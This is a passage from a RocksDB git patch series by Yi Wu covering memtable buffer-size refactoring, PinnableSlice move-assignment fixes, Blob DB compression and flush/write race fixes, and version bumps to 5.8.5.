+ gen_l0_kb(2); + ASSERT_EQ(NumTableFilesAtLevel(0), 2); ASSERT_LT(SizeAtLevel(0), k128KB + k64KB + 2 * k5KB); ASSERT_GT(SizeAtLevel(0), k128KB + k64KB - 4 * k5KB); diff --git a/db/memtable.cc b/db/memtable.cc index 22b4125e075..d51b2618734 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -38,10 +38,10 @@ namespace rocksdb { -MemTableOptions::MemTableOptions(const ImmutableCFOptions& ioptions, - const MutableCFOptions& mutable_cf_options) - : write_buffer_size(mutable_cf_options.write_buffer_size), - arena_block_size(mutable_cf_options.arena_block_size), +ImmutableMemTableOptions::ImmutableMemTableOptions( + const ImmutableCFOptions& ioptions, + const MutableCFOptions& mutable_cf_options) + : arena_block_size(mutable_cf_options.arena_block_size), memtable_prefix_bloom_bits( static_cast( static_cast(mutable_cf_options.write_buffer_size) * @@ -82,6 +82,7 @@ MemTable::MemTable(const InternalKeyComparator& cmp, data_size_(0), num_entries_(0), num_deletes_(0), + write_buffer_size_(mutable_cf_options.write_buffer_size), flush_in_progress_(false), flush_completed_(false), file_number_(0), @@ -135,6 +136,7 @@ size_t MemTable::ApproximateMemoryUsage() { } bool MemTable::ShouldFlushNow() const { + size_t write_buffer_size = write_buffer_size_.load(std::memory_order_relaxed); // In a lot of times, we cannot allocate arena blocks that exactly matches the // buffer size. Thus we have to decide if we should over-allocate or // under-allocate. @@ -152,16 +154,14 @@ bool MemTable::ShouldFlushNow() const { // if we can still allocate one more block without exceeding the // over-allocation ratio, then we should not flush. if (allocated_memory + kArenaBlockSize < - moptions_.write_buffer_size + - kArenaBlockSize * kAllowOverAllocationRatio) { return false; } - // if user keeps adding entries that exceeds moptions.write_buffer_size, - // we need to flush earlier even though we still have much available - // memory left. - if (allocated_memory > moptions_.write_buffer_size + - kArenaBlockSize * kAllowOverAllocationRatio) { + write_buffer_size + kArenaBlockSize * kAllowOverAllocationRatio) { return false; } - // if user keeps adding entries that exceeds moptions.write_buffer_size, - // we need to flush earlier even though we still have much available - // memory left. + // if user keeps adding entries that exceed write_buffer_size, we need to + // flush earlier even though we still have much available memory left. 
+ if (allocated_memory > + write_buffer_size + kArenaBlockSize * kAllowOverAllocationRatio) { return true; } @@ -264,7 +264,8 @@ class MemTableIterator : public InternalIterator { comparator_(mem.comparator_), valid_(false), arena_mode_(arena != nullptr), - value_pinned_(!mem.GetMemTableOptions()->inplace_update_support) { + value_pinned_( + !mem.GetImmutableMemTableOptions()->inplace_update_support) { if (use_range_del_table) { iter_ = mem.range_del_table_->GetIterator(arena); } else if (prefix_extractor_ != nullptr && !read_options.total_order_seek) { diff --git a/db/memtable.h b/db/memtable.h index 89679248425..4f63818eee8 100644 --- a/db/memtable.h +++ b/db/memtable.h @@ -35,11 +35,9 @@ class MemTableIterator; class MergeContext; class InternalIterator; -struct MemTableOptions { - explicit MemTableOptions( - const ImmutableCFOptions& ioptions, - const MutableCFOptions& mutable_cf_options); - size_t write_buffer_size; +struct ImmutableMemTableOptions { + explicit ImmutableMemTableOptions(const ImmutableCFOptions& ioptions, + const MutableCFOptions& mutable_cf_options); size_t arena_block_size; uint32_t memtable_prefix_bloom_bits; size_t memtable_huge_page_size; @@ -260,6 +258,18 @@ class MemTable { return num_deletes_.load(std::memory_order_relaxed); } + // Dynamically change the memtable's capacity. If set below the current usage, + // the next key added will trigger a flush. Can only increase size when + // memtable prefix bloom is disabled, since we can't easily allocate more + // space. + void UpdateWriteBufferSize(size_t new_write_buffer_size) { + if (prefix_bloom_ == nullptr || + new_write_buffer_size < write_buffer_size_) { + write_buffer_size_.store(new_write_buffer_size, + std::memory_order_relaxed); + } + } + // Returns the edits area that is needed for flushing the memtable VersionEdit* GetEdits() { return &edit_; } @@ -348,7 +358,9 @@ class MemTable { return comparator_.comparator; } - const MemTableOptions* GetMemTableOptions() const { return &moptions_; } + const ImmutableMemTableOptions* GetImmutableMemTableOptions() const { + return &moptions_; + } uint64_t ApproximateOldestKeyTime() const { return oldest_key_time_.load(std::memory_order_relaxed); @@ -362,7 +374,7 @@ class MemTable { friend class MemTableList; KeyComparator comparator_; - const MemTableOptions moptions_; + const ImmutableMemTableOptions moptions_; int refs_; const size_t kArenaBlockSize; AllocTracker mem_tracker_; @@ -376,6 +388,9 @@ class MemTable { std::atomic num_entries_; std::atomic num_deletes_; + // Dynamically changeable memtable option + std::atomic write_buffer_size_; + // These are used to manage memtable flushes to storage bool flush_in_progress_; // started the flush bool flush_completed_; // finished the flush diff --git a/db/write_batch.cc b/db/write_batch.cc index 89ae044c8b2..76fc94844a7 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -992,7 +992,7 @@ class MemTableInserter : public WriteBatch::Handler { } MemTable* mem = cf_mems_->GetMemTable(); - auto* moptions = mem->GetMemTableOptions(); + auto* moptions = mem->GetImmutableMemTableOptions(); if (!moptions->inplace_update_support) { mem->Add(sequence_, value_type, key, value, concurrent_memtable_writes_, get_post_process_info(mem)); @@ -1139,7 +1139,7 @@ class MemTableInserter : public WriteBatch::Handler { } MemTable* mem = cf_mems_->GetMemTable(); - auto* moptions = mem->GetMemTableOptions(); + auto* moptions = mem->GetImmutableMemTableOptions(); bool perform_merge = false; // If we pass DB through and 
options.max_successive_merges is hit From 5dc70a15caa8d6834498a3b6bfcd0f50eeaea524 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 3 Nov 2017 18:10:36 -0700 Subject: [PATCH 191/205] Fix PinnableSlice move assignment Summary: After move assignment, we need to re-initialize the moved PinnableSlice. Also update blob_db_impl.cc to not reuse the moved PinnableSlice since it is supposed to be in an undefined state after move. Closes https://github.com/facebook/rocksdb/pull/3127 Differential Revision: D6238585 Pulled By: yiwu-arbug fbshipit-source-id: bd99f2e37406c4f7de160c7dee6a2e8126bc224e --- include/rocksdb/slice.h | 4 ++++ util/slice_test.cc | 1 + utilities/blob_db/blob_db_impl.cc | 10 ++++++---- 3 files changed, 11 insertions(+), 4 deletions(-) diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index 924f1faef72..38e7efb6565 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -150,6 +150,10 @@ class PinnableSlice : public Slice, public Cleanable { } else { buf_ = other.buf_; } + // Re-initialize the other PinnableSlice. + other.self_space_.clear(); + other.buf_ = &other.self_space_; + other.pinned_ = false; } return *this; } diff --git a/util/slice_test.cc b/util/slice_test.cc index 308e1c312ff..33903ec72b9 100644 --- a/util/slice_test.cc +++ b/util/slice_test.cc @@ -47,6 +47,7 @@ TEST_F(SliceTest, PinnableSliceMoveConstruct) { ASSERT_EQ("bar", s2->ToString()); s2->RegisterCleanup(BumpCounter, &orig_cleanup, nullptr); *s2 = std::move(*s1); + ASSERT_FALSE(s1->IsPinned()); ASSERT_EQ("foo", s2->ToString()); ASSERT_EQ(1, orig_cleanup); ASSERT_EQ(0, moved_cleanup); diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 6edafe1790e..2a18ee4e05f 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1226,13 +1226,15 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, Status s; bool is_blob_index = false; - s = db_impl_->GetImpl(ro, column_family, key, value, nullptr /*value_found*/, - &is_blob_index); + PinnableSlice index_entry; + s = db_impl_->GetImpl(ro, column_family, key, &index_entry, + nullptr /*value_found*/, &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); if (s.ok()) { + if (!is_blob_index) { + *value = std::move(index_entry); + } else { - if (is_blob_index) { - PinnableSlice index_entry = std::move(*value); s = GetBlobValue(key, index_entry, value); } } From 13b2a9b6ff4d9f2d6954eb36755bb0ff35ea2528 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 7 Nov 2017 17:40:44 -0800 Subject: [PATCH 192/205] Blob DB: use compression in file header instead of global options Summary: Fix the issue of failing to decompress existing values after reopening the DB with different compression settings. 
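To make the fixed scenario concrete, here is a hedged sketch that mirrors the DecompressAfterReopen test added below; the helper name and path handling are illustrative, and only APIs that appear elsewhere in this patch series are used:

#include <cassert>
#include <string>
#include "utilities/blob_db/blob_db.h"

void ReopenWithDifferentCompression(const std::string& dbname) {
  rocksdb::Options options;
  options.create_if_missing = true;
  rocksdb::blob_db::BlobDBOptions bdb_options;
  bdb_options.min_blob_size = 0;
  bdb_options.compression = rocksdb::kSnappyCompression;
  rocksdb::blob_db::BlobDB* blob_db = nullptr;
  assert(rocksdb::blob_db::BlobDB::Open(options, bdb_options, dbname,
                                        &blob_db).ok());
  // Written with Snappy compression recorded in the blob file header.
  assert(blob_db->Put(rocksdb::WriteOptions(), "key", "value").ok());
  delete blob_db;

  // Reopen with compression disabled. Reads still decompress correctly,
  // because each blob file's header records its own compression type.
  bdb_options.compression = rocksdb::kNoCompression;
  assert(rocksdb::blob_db::BlobDB::Open(options, bdb_options, dbname,
                                        &blob_db).ok());
  std::string value;
  assert(blob_db->Get(rocksdb::ReadOptions(), "key", &value).ok());
  assert(value == "value");
  delete blob_db;
}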
Closes https://github.com/facebook/rocksdb/pull/3142 Differential Revision: D6267260 Pulled By: yiwu-arbug fbshipit-source-id: c7cf7f3e33b0cd25520abf4771cdf9180cc02a5f --- utilities/blob_db/blob_db_impl.cc | 8 ++++++-- utilities/blob_db/blob_db_test.cc | 26 ++++++++++++++++++++++++++ utilities/blob_db/blob_file.cc | 2 ++ utilities/blob_db/blob_file.h | 9 +++++++++ 4 files changed, 43 insertions(+), 2 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 2a18ee4e05f..319b0f29403 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -330,6 +330,7 @@ Status BlobDBImpl::OpenAllFiles() { continue; } bfptr->SetHasTTL(bfptr->header_.has_ttl); + bfptr->SetCompression(bfptr->header_.compression); bfptr->header_valid_ = true; std::shared_ptr ra_reader = @@ -567,6 +568,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { reinterpret_cast(DefaultColumnFamily())->GetID(); bfile->header_valid_ = true; bfile->SetHasTTL(false); + bfile->SetCompression(bdb_options_.compression); Status s = writer->WriteHeader(bfile->header_); if (!s.ok()) { @@ -627,6 +629,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { ; bfile->header_valid_ = true; bfile->SetHasTTL(true); + bfile->SetCompression(bdb_options_.compression); bfile->file_size_ = BlobLogHeader::kSize; // set the first value of the range, since that is @@ -882,6 +885,7 @@ Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, return Status::NotFound("Blob file not found"); } + assert(bfile->compression() == bdb_options_.compression); std::string compression_output; Slice value_compressed = GetCompressedSlice(value, &compression_output); @@ -1196,12 +1200,12 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, // TODO(yiwu): Should use compression flag in the blob file instead of // current compression option. 
- if (bdb_options_.compression != kNoCompression) { + if (bfile->compression() != kNoCompression) { BlockContents contents; auto cfh = reinterpret_cast(DefaultColumnFamily()); s = UncompressBlockContentsForCompressionType( blob_value.data(), blob_value.size(), &contents, - kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, + kBlockBasedTableVersionFormat, Slice(), bfile->compression(), *(cfh->cfd()->ioptions())); *(value->GetSelf()) = contents.data.ToString(); } diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 708cec5c780..9f627061a2e 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -58,6 +58,14 @@ class BlobDBTest : public testing::Test { ASSERT_OK(TryOpen(bdb_options, options)); } + void Reopen(BlobDBOptions bdb_options = BlobDBOptions(), + Options options = Options()) { + assert(blob_db_ != nullptr); + delete blob_db_; + blob_db_ = nullptr; + Open(bdb_options, options); + } + void Destroy() { if (blob_db_) { Options options = blob_db_->GetOptions(); @@ -573,6 +581,24 @@ TEST_F(BlobDBTest, Compression) { } VerifyDB(data); } + +TEST_F(BlobDBTest, DecompressAfterReopen) { + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; + bdb_options.disable_background_tasks = true; + bdb_options.compression = CompressionType::kSnappyCompression; + Open(bdb_options); + std::map data; + for (size_t i = 0; i < 100; i++) { + PutRandom("put-key" + ToString(i), &rnd, &data); + } + VerifyDB(data); + bdb_options.compression = CompressionType::kNoCompression; + Reopen(bdb_options); + VerifyDB(data); +} + #endif TEST_F(BlobDBTest, MultipleWriters) { diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index bbd88572554..162f364a2f5 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -30,6 +30,7 @@ BlobFile::BlobFile() : parent_(nullptr), file_number_(0), has_ttl_(false), + compression_(kNoCompression), blob_count_(0), gc_epoch_(-1), file_size_(0), @@ -49,6 +50,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) path_to_dir_(bdir), file_number_(fn), has_ttl_(false), + compression_(kNoCompression), blob_count_(0), gc_epoch_(-1), file_size_(0), diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index 239e8e1c541..ad738170ec1 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -41,6 +41,9 @@ class BlobFile { // have TTL. bool has_ttl_; + // Compression type of blobs in the file + CompressionType compression_; + // number of blobs in the file std::atomic blob_count_; @@ -173,6 +176,12 @@ class BlobFile { void SetHasTTL(bool has_ttl) { has_ttl_ = has_ttl; } + CompressionType compression() const { return compression_; } + + void SetCompression(CompressionType compression) { + compression_ = compression; + } + std::shared_ptr GetWriter() const { return log_writer_; } private: From b7367fe8442b1dcf4fc3ba64dc5e19eb3b5d8376 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 7 Nov 2017 22:59:14 -0800 Subject: [PATCH 193/205] Bump version to 5.8.3 --- HISTORY.md | 3 +++ include/rocksdb/version.h | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index f8f74ca0373..6792795bafb 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,7 @@ # Rocksdb Change Log +## 5.8.3 (11/08/2017) +No major changes. + ## 5.8.2 (11/03/2017) No major changes. 
diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index e791dcca6e7..ab6ca7a19e2 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 2 +#define ROCKSDB_PATCH 3 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From 725bb9d665a98b2e517924aecab944eaedfb5c92 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Wed, 8 Nov 2017 13:08:15 -0800 Subject: [PATCH 194/205] Blob DB: Fix release build Summary: `compression` shadow the method name in `BlobFile`. Rename it. Closes https://github.com/facebook/rocksdb/pull/3148 Differential Revision: D6274498 Pulled By: yiwu-arbug fbshipit-source-id: 7d293596530998b23b6b8a8940f983f9b6343a98 --- utilities/blob_db/blob_file.h | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index ad738170ec1..4085cfef0bf 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -178,8 +178,8 @@ class BlobFile { CompressionType compression() const { return compression_; } - void SetCompression(CompressionType compression) { - compression_ = compression; + void SetCompression(CompressionType c) { + compression_ = c; } std::shared_ptr GetWriter() const { return log_writer_; } From 5d928c795af796140a0937515c14d0e0a1e77f30 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Wed, 8 Nov 2017 19:33:12 -0800 Subject: [PATCH 195/205] Blob DB: Fix race condition between flush and write Summary: A race condition will happen when: * a user thread writes a value, but it hits the write stop condition because there are too many un-flushed memtables, while holding blob_db_impl.write_mutex_. * Flush is triggered and call flush begin listener and try to acquire blob_db_impl.write_mutex_. Fixing it. Closes https://github.com/facebook/rocksdb/pull/3149 Differential Revision: D6279805 Pulled By: yiwu-arbug fbshipit-source-id: 0e3c58afb78795ebe3360a2c69e05651e3908c40 --- utilities/blob_db/blob_db_impl.cc | 31 +++++++++++++++++++++++-------- 1 file changed, 23 insertions(+), 8 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 319b0f29403..1b13513922a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -745,13 +745,22 @@ class BlobDBImpl::BlobInserter : public WriteBatch::Handler { }; Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) { - MutexLock l(&write_mutex_); uint32_t default_cf_id = reinterpret_cast(DefaultColumnFamily())->GetID(); + // TODO(yiwu): In case there are multiple writers the latest sequence would + // not be the actually sequence we are writting. Need to get the sequence + // from write batch after DB write instead. SequenceNumber current_seq = GetLatestSequenceNumber() + 1; + Status s; BlobInserter blob_inserter(options, this, default_cf_id, current_seq); - Status s = updates->Iterate(&blob_inserter); + { + // Release write_mutex_ before DB write to avoid race condition with + // flush begin listener, which also require write_mutex_ to sync + // blob files. 
+ MutexLock l(&write_mutex_); + s = updates->Iterate(&blob_inserter); + } if (!s.ok()) { return s; } @@ -759,7 +768,6 @@ Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) { if (!s.ok()) { return s; } - assert(blob_inserter.sequence() == GetLatestSequenceNumber() + 1); // add deleted key to list of keys that have been deleted for book-keeping class DeleteBookkeeper : public WriteBatch::Handler { @@ -849,10 +857,19 @@ Status BlobDBImpl::PutWithTTL(const WriteOptions& options, Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t expiration) { TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); - MutexLock l(&write_mutex_); - SequenceNumber sequence = GetLatestSequenceNumber() + 1; + Status s; WriteBatch batch; - Status s = PutBlobValue(options, key, value, expiration, sequence, &batch); + { + // Release write_mutex_ before DB write to avoid race condition with + // flush begin listener, which also require write_mutex_ to sync + // blob files. + MutexLock l(&write_mutex_); + // TODO(yiwu): In case there are multiple writers the latest sequence would + // not be the actually sequence we are writting. Need to get the sequence + // from write batch after DB write instead. + SequenceNumber sequence = GetLatestSequenceNumber() + 1; + s = PutBlobValue(options, key, value, expiration, sequence, &batch); + } if (s.ok()) { s = db_->Write(options, &batch); } @@ -1198,8 +1215,6 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, return Status::Corruption("Corruption. Blob CRC mismatch"); } - // TODO(yiwu): Should use compression flag in the blob file instead of - // current compression option. if (bfile->compression() != kNoCompression) { BlockContents contents; auto cfh = reinterpret_cast(DefaultColumnFamily()); From 4907d2463b632e942e977cca805b6485eae7896d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Wed, 8 Nov 2017 21:28:42 -0800 Subject: [PATCH 196/205] Bump version to 5.8.4 --- HISTORY.md | 6 ------ include/rocksdb/version.h | 2 +- 2 files changed, 1 insertion(+), 7 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 6792795bafb..e62622e081c 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,10 +1,4 @@ # Rocksdb Change Log -## 5.8.3 (11/08/2017) -No major changes. - -## 5.8.2 (11/03/2017) -No major changes. - ## 5.8.1 (10/23/2017) ### New Features * Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index ab6ca7a19e2..61ca0a1e3fe 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 3 +#define ROCKSDB_PATCH 4 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From e8c9350f269a3940a58d1f33ffc29d97538ca8ee Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 13 Nov 2017 18:03:57 -0800 Subject: [PATCH 197/205] Blob DB: not using PinnableSlice move assignment Summary: The current implementation of PinnableSlice move assignment have an issue #3163. We are moving away from it instead of try to get the move assignment right, since it is too tricky. 
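The trickiness comes from PinnableSlice being self-referential: when it pins its own self_space_, its data_ pointer refers into one of its own members, so a memberwise move leaves the destination pointing at the moved-from object's storage. The stand-in type below is hypothetical (not the real PinnableSlice) and only demonstrates the failure mode plus the copy-out-and-repin alternative, analogous to the value->ToString() copy in the diff below.

#include <cassert>
#include <string>
#include <utility>

// Stripped-down stand-in for a self-pinning slice.
struct SelfRefSlice {
  std::string self_space_;
  const char* data_ = nullptr;

  void PinSelf(const std::string& s) {
    self_space_ = s;
    data_ = self_space_.data();  // points into our own member
  }
};

int main() {
  SelfRefSlice a;
  a.PinSelf("foo");

  // A naive memberwise move copies data_ verbatim, so b.data_ can still
  // point at a's (now moved-from) internal buffer.
  SelfRefSlice b;
  b.self_space_ = std::move(a.self_space_);
  b.data_ = a.data_;  // bug: not guaranteed to equal b.self_space_.data()

  // The safe pattern: copy the bytes out and re-pin in the destination.
  SelfRefSlice c;
  c.PinSelf(b.self_space_);
  assert(c.data_ == c.self_space_.data());
  return 0;
}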
Closes https://github.com/facebook/rocksdb/pull/3164 Differential Revision: D6319201 Pulled By: yiwu-arbug fbshipit-source-id: 8f3279021f3710da4a4caa14fd238ed2df902c48 --- CMakeLists.txt | 1 - Makefile | 4 -- TARGETS | 1 - include/rocksdb/slice.h | 25 ----------- src.mk | 1 - util/slice_test.cc | 71 ------------------------------- utilities/blob_db/blob_db_impl.cc | 13 +++--- utilities/blob_db/blob_db_test.cc | 12 ++++++ 8 files changed, 17 insertions(+), 111 deletions(-) delete mode 100644 util/slice_test.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index 18effaa0667..2d99cdf9445 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -802,7 +802,6 @@ if(WITH_TESTS) util/hash_test.cc util/heap_test.cc util/rate_limiter_test.cc - util/slice_test.cc util/slice_transform_test.cc util/timer_queue_test.cc util/thread_list_test.cc diff --git a/Makefile b/Makefile index c5ba1012444..5a89f6bf79d 100644 --- a/Makefile +++ b/Makefile @@ -477,7 +477,6 @@ TESTS = \ object_registry_test \ repair_test \ env_timed_test \ - slice_test \ PARALLEL_TEST = \ backupable_db_test \ @@ -1436,9 +1435,6 @@ range_del_aggregator_test: db/range_del_aggregator_test.o db/db_test_util.o $(LI blob_db_test: utilities/blob_db/blob_db_test.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -slice_test: util/slice_test.o $(LIBOBJECTS) $(TESTHARNESS) - $(AM_LINK) - #------------------------------------------------- # make install related stuff INSTALL_PATH ?= /usr/local diff --git a/TARGETS b/TARGETS index c9631b25ae1..ac85eab93c7 100644 --- a/TARGETS +++ b/TARGETS @@ -463,7 +463,6 @@ ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'], ['repair_test', 'db/repair_test.cc', 'serial'], ['sim_cache_test', 'utilities/simulator_cache/sim_cache_test.cc', 'serial'], ['skiplist_test', 'memtable/skiplist_test.cc', 'serial'], - ['slice_test', 'util/slice_test.cc', 'serial'], ['slice_transform_test', 'util/slice_transform_test.cc', 'serial'], ['spatial_db_test', 'utilities/spatialdb/spatial_db_test.cc', 'serial'], ['sst_dump_test', 'tools/sst_dump_test.cc', 'serial'], diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index 38e7efb6565..4f24c8a2217 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -133,31 +133,6 @@ class PinnableSlice : public Slice, public Cleanable { PinnableSlice(PinnableSlice&) = delete; PinnableSlice& operator=(PinnableSlice&) = delete; - PinnableSlice(PinnableSlice&& other) { *this = std::move(other); } - - PinnableSlice& operator=(PinnableSlice&& other) { - if (this != &other) { - // cleanup itself. - Reset(); - - Slice::operator=(other); - Cleanable::operator=(std::move(other)); - pinned_ = other.pinned_; - if (!pinned_ && other.buf_ == &other.self_space_) { - self_space_ = std::move(other.self_space_); - buf_ = &self_space_; - data_ = buf_->data(); - } else { - buf_ = other.buf_; - } - // Re-initialize the other PinnablaeSlice. 
- other.self_space_.clear(); - other.buf_ = &other.self_space_; - other.pinned_ = false; - } - return *this; - } - inline void PinSlice(const Slice& s, CleanupFunction f, void* arg1, void* arg2) { assert(!pinned_); diff --git a/src.mk b/src.mk index bb08721df95..5bd5236fa16 100644 --- a/src.mk +++ b/src.mk @@ -326,7 +326,6 @@ MAIN_SOURCES = \ util/filelock_test.cc \ util/log_write_bench.cc \ util/rate_limiter_test.cc \ - util/slice_test.cc \ util/slice_transform_test.cc \ util/timer_queue_test.cc \ util/thread_list_test.cc \ diff --git a/util/slice_test.cc b/util/slice_test.cc deleted file mode 100644 index 33903ec72b9..00000000000 --- a/util/slice_test.cc +++ /dev/null @@ -1,71 +0,0 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). - -#include "port/stack_trace.h" -#include "rocksdb/slice.h" -#include "util/testharness.h" - -namespace rocksdb { - -class SliceTest : public testing::Test {}; - -namespace { -void BumpCounter(void* arg1, void* arg2) { - (*reinterpret_cast(arg1))++; -} -} // anonymous namespace - -TEST_F(SliceTest, PinnableSliceMoveConstruct) { - for (int i = 0; i < 3; i++) { - int orig_cleanup = 0; - int moved_cleanup = 0; - PinnableSlice* s1 = nullptr; - std::string external_storage; - switch (i) { - case 0: - s1 = new PinnableSlice(); - *(s1->GetSelf()) = "foo"; - s1->PinSelf(); - s1->RegisterCleanup(BumpCounter, &moved_cleanup, nullptr); - break; - case 1: - s1 = new PinnableSlice(&external_storage); - *(s1->GetSelf()) = "foo"; - s1->PinSelf(); - s1->RegisterCleanup(BumpCounter, &moved_cleanup, nullptr); - break; - case 2: - s1 = new PinnableSlice(); - s1->PinSlice("foo", BumpCounter, &moved_cleanup, nullptr); - break; - } - ASSERT_EQ("foo", s1->ToString()); - PinnableSlice* s2 = new PinnableSlice(); - s2->PinSelf("bar"); - ASSERT_EQ("bar", s2->ToString()); - s2->RegisterCleanup(BumpCounter, &orig_cleanup, nullptr); - *s2 = std::move(*s1); - ASSERT_FALSE(s1->IsPinned()); - ASSERT_EQ("foo", s2->ToString()); - ASSERT_EQ(1, orig_cleanup); - ASSERT_EQ(0, moved_cleanup); - delete s1; - // ASAN will check if it will access storage of s1, which is deleted. 
- ASSERT_EQ("foo", s2->ToString()); - ASSERT_EQ(1, orig_cleanup); - ASSERT_EQ(0, moved_cleanup); - delete s2; - ASSERT_EQ(1, orig_cleanup); - ASSERT_EQ(1, moved_cleanup); - } -} - -} // namespace rocksdb - -int main(int argc, char** argv) { - rocksdb::port::InstallStackTraceHandler(); - ::testing::InitGoogleTest(&argc, argv); - return RUN_ALL_TESTS(); -} diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1b13513922a..23f173fd9a9 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1245,17 +1245,14 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, Status s; bool is_blob_index = false; - PinnableSlice index_entry; - s = db_impl_->GetImpl(ro, column_family, key, &index_entry, + s = db_impl_->GetImpl(ro, column_family, key, value, nullptr /*value_found*/, &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); - if (s.ok()) { - if (!is_blob_index) { - *value = std::move(index_entry); - } else { - s = GetBlobValue(key, index_entry, value); - } + if (s.ok() && is_blob_index) { + std::string index_entry = value->ToString(); + value->Reset(); + s = GetBlobValue(key, index_entry, value); } if (snapshot_created) { db_->ReleaseSnapshot(ro.snapshot); diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 9f627061a2e..03396eed389 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -150,6 +150,18 @@ class BlobDBTest : public testing::Test { } void VerifyDB(DB *db, const std::map<std::string, std::string> &data) { + // Verify normal Get + auto* cfh = db->DefaultColumnFamily(); + for (auto &p : data) { + PinnableSlice value_slice; + ASSERT_OK(db->Get(ReadOptions(), cfh, p.first, &value_slice)); + ASSERT_EQ(p.second, value_slice.ToString()); + std::string value; + ASSERT_OK(db->Get(ReadOptions(), cfh, p.first, &value)); + ASSERT_EQ(p.second, value); + } + + // Verify iterators Iterator *iter = db->NewIterator(ReadOptions()); iter->SeekToFirst(); for (auto &p : data) { From cf2b982375a8b4da158697724a3b72781dfaf3e5 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 14 Nov 2017 10:38:22 -0800 Subject: [PATCH 198/205] Bump version to 5.8.5 --- include/rocksdb/version.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index 